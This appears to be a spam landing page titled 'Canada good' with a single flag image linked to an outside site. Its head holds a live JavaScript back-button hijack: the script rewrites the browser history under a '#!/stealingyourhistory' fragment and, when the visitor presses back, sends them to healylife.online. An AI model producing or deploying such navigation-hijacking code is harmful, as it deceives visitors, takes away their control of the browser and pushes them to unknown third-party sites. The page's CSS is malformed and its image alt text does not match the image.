<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Canada good</title>
<style>
   body {
    background-color: white; /* Цвет фона */
    no-repeat;
width: 50%;
height: 50px;
   }
  </style>
  <script type = "text/javascript">
(function(window, location) {
    history.replaceState(null, document.title, location.pathname+"#!/stealingyourhistory");
    history.pushState(null, document.title, location.pathname);

    window.addEventListener("popstate", function() {
      if(location.hash === "#!/stealingyourhistory") {
            history.replaceState(null, document.title, location.pathname);
            setTimeout(function(){
              location.replace("https://healylife.online/9tNSjGFG");
            },0);
      }
    }, false);
}(window, location));
</script>
 </head>
 <body>
<a href="https://healylife.online/9tNSjGFG"><img align="center" src="frcaflags.png" alt="Girl in a jacket" width="800" height="800">
                                                                
                                                            
</body>
</html>